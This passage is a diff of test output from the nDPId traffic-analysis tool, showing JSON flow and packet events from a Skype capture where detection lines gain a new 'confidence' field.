 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1sE4AAEARMsfAqAEinTc4oTLdnF8AITASe2kC9psOqbEN3IbEA34wiMcNZp24IiAl1w=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9lmMAAEARmbbAqAEinTfrlDLdnGEAKXtSe2sCw7Vy\/6hHK2XTagfLmixWAHOAd\/loE1p\/EyV7QPa1"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00424{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"ts_msec":1431970666370,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="}
 00175{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -513,10 +513,10 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fE8AAEARfyTAqAEib91NlTLdnFAAKVN0e20CYiNLpCtZKVRm5qzsJsm2qgqqm\/VHJHAXu9AEnz3Z"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7vtoAAEARQB3AqAEib91KEzLdnEEAJxFYe28CrL8oxTm2+6Ol0c4xcn\/aCmr6scDIaqNamEoS7g=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="}
@@ -527,19 +527,19 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6bg8AAEARKxbAqAEinTeCjDLdnEsAJgsKe3ECMurpMuGdyMUwflNlvhyptKR18dfr99Rpa+D7"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAABBDu8AAEARihTAqAEinTeCpzLdnF8ALeNce3MCnSaJe8js0\/W0uOkrjvFqVEozNuFXZVFpbX\/qiFWAThpduA=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4i7gAAEARb8PAqAEib91NkjLdgQkAJGEVe3UC\/j9SXtMCBQsEGLuepyVsXxpYMSM\/UQo5ag=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6QgAAEARDjHAqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkhAAAEARZSnAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
